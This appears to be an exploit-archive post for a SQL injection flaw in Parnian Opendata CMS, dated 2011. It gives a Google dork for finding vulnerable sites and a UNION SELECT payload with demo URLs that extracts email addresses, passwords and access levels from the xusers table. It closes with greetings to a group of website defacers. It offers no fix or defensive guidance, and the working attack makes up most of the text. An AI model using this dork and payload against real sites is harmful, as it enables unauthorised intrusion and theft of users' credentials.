27 lines
No EOL
815 B
Text
27 lines
No EOL
815 B
Text
###########################################################################
|
|
|
|
Exploit Title : Parnian Opendata CMS SQL Injection Vulnerability
|
|
|
|
Date : 2011-04-15
|
|
|
|
Author : *Alexander*
|
|
|
|
Software Link : http://www.parniansoft.com/
|
|
|
|
Test On : php
|
|
|
|
CVE : Web Applications
|
|
|
|
Google Dork : inurl:mpfn=pdview
|
|
|
|
Exploit : mpfn=pdview&id=-1+union+select +1,2,3,4,5,group_concat(email,0x3a,password,0x3a,level),7,8,9,10,11,12,13,14,15,16+from+xusers
|
|
|
|
Demo : http://server/index.php?mpfn=pdview&id=1'
|
|
|
|
http://server/index.php?mpfn=pdview&id=-1+union+select +1,2,3,4,5,group_concat(email,0x3a,password,0x3a,level),7,8,9,10,11,12,13,14,15,16+from+xusers
|
|
|
|
###########################################################################
|
|
|
|
Greetz : http://Ashiyane.org/Forums
|
|
|
|
Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers |